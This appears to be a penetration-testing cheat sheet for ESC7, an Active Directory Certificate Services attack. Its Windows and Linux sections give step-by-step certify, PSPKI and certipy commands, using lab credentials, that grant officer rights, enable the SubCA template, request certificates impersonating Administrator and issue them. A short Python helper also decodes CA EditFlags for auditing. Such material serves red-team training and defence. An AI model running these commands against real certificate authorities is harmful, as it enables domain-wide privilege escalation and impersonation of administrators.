ESC7
Vulnerable Certificate Authority Access Control
Two sets of CA permissions pose a security risk:
- `ManageCA` (or ManageCertificates)
- `ManageCertificates` (or Certificate Manager)
Enumerate using certsrv.msc
```powershell
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
```
Query the CA with certutil (`EditFlags` value)
Check whether `EDITF_ATTRIBUTESUBJECTALTNAME2` is set: a value of 1376590 means it is.
```powershell
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
```
Enumerate using the PSPKI module
```powershell
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
```
Windows
Attack 1 (Allow SAN by flipping `EDITF_ATTRIBUTESUBJECTALTNAME2`)
A principal holding `ManageCA` can manipulate CA settings remotely using PSPKI, including toggling the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack was patched in May 2022, so Attack #2 may be a better alternative if that patch is in place.
Note: the change has no effect until the CA service (CertSvc) is restarted. `ManageCA` users have the right to restart it, but they can't do so remotely.
- Request a certificate template
```powershell
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
```
- Import the PSPKI module
```powershell
Import-Module PSPKI
```
- Approve the pending request
```powershell
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
```
- Download the approved request
```powershell
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
```
Post Attack
Disable `EDITF_ATTRIBUTESUBJECTALTNAME2` with PowerShell
```powershell
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
$ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
```
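The `EditFlags` check above (1376590 means the SAN flag is set) and the post-attack value (1114446) are both just bitmask arithmetic on the policy module's `EditFlags` DWORD. The following is an added audit helper, not code from the original page or from certutil/PSPKI: it decodes the value reported by `certutil -getreg policy\EditFlags`, flags whether `EDITF_ATTRIBUTESUBJECTALTNAME2` is set, and computes the hardened value with only that bit cleared. The flag table is the subset of `EDITF_*` constants from certsrv.h needed here; the sample values are the ones quoted on this page.

```python
# Added example (not the page's or certutil's own code): decode the CA policy
# EditFlags DWORD, detect EDITF_ATTRIBUTESUBJECTALTNAME2 and derive the fixed value.
# Bit values are a subset of the EDITF_* constants from certsrv.h.
EDITF_FLAGS = {
    "EDITF_ENABLEREQUESTEXTENSIONS": 0x00000001,
    "EDITF_REQUESTEXTENSIONLIST": 0x00000002,
    "EDITF_DISABLEEXTENSIONLIST": 0x00000004,
    "EDITF_ADDOLDKEYUSAGE": 0x00000008,
    "EDITF_BASICCONSTRAINTSCRITICAL": 0x00000040,
    "EDITF_ENABLEAKIKEYID": 0x00000100,
    "EDITF_ENABLEDEFAULTSMIME": 0x00010000,
    "EDITF_ATTRIBUTESUBJECTALTNAME2": 0x00040000,
    "EDITF_AUDITCERTTEMPLATELOAD": 0x00100000,
}
SAN2 = EDITF_FLAGS["EDITF_ATTRIBUTESUBJECTALTNAME2"]


def parse_editflags(value):
    """Accept the DWORD as an int, a decimal string ("1376590"), a prefixed hex
    string ("0x15014e") or the bare hex certutil prints ("15014e")."""
    if isinstance(value, int):
        return value
    text = value.strip().lower()
    if text.startswith("0x"):
        return int(text, 16)
    if text.isdigit():          # all-digit strings are read as decimal
        return int(text, 10)
    return int(text, 16)        # otherwise bare hex, e.g. "15014e"


def decode_editflags(value):
    """Names of the known bits set in an EditFlags value."""
    flags = parse_editflags(value)
    return [name for name, bit in EDITF_FLAGS.items() if flags & bit]


def san_attribute_enabled(value):
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 is set, i.e. any enrollee can
    supply a SAN through request attributes (the ESC6 / ESC7 exposure)."""
    return bool(parse_editflags(value) & SAN2)


def hardened_editflags(value):
    """Same EditFlags with only the SAN2 bit cleared; every other bit is kept."""
    return parse_editflags(value) & ~SAN2


if __name__ == "__main__":
    observed = 1376590  # constructed sample: the "flag set" value quoted on this page
    print(f"EditFlags={observed:#x} -> {decode_editflags(observed)}")
    if san_attribute_enabled(observed):
        print(f"SAN2 set; cleared value would be {hardened_editflags(observed)}")
```

The cleared value for 1376590 is 1114446, the same number the PowerShell snippet above writes back; in practice the bit is cleared with `certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` followed by a CertSvc restart.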
Attack 2 (gain `ManageCertificates` right using `ManageCA`)
For this attack we only need the `ManageCA` permission. The `Manage Certificates` permission and an enabled `SubCA` certificate template are also required, but both can be enabled by a `ManageCA` holder.
- Grant `Manage Certificates` access (optional, if we don't already have it)
```bash
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
```
- Enable the `SubCA` certificate template (optional, the SubCA template is enabled by default)
```bash
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
```
- Request a certificate based on the `SubCA` template
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
```
- Issue the failed certificate request
```bash
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
```
- Retrieve the issued certificate
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
```
Linux
Attack 1 (`ManageCA` rights)
- Add `Manage Certificates` access rights to BlWasp
```bash
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWasp
```
- Request a certificate with a SAN (`Enrollee Supplies Subject: True`)
```bash
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
```
- Issue the certificate
```bash
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31
```
- Retrieve the certificate by its ID to authenticate with it
```bash
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 31
```
Attack 2 (`ManageCertificates` rights)
- Request a certificate that requires manager approval
```bash
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC7_1 -upn Administrator
```
- Approve the pending request
```bash
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 59
```
- Retrieve the approved request
```bash
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 59
```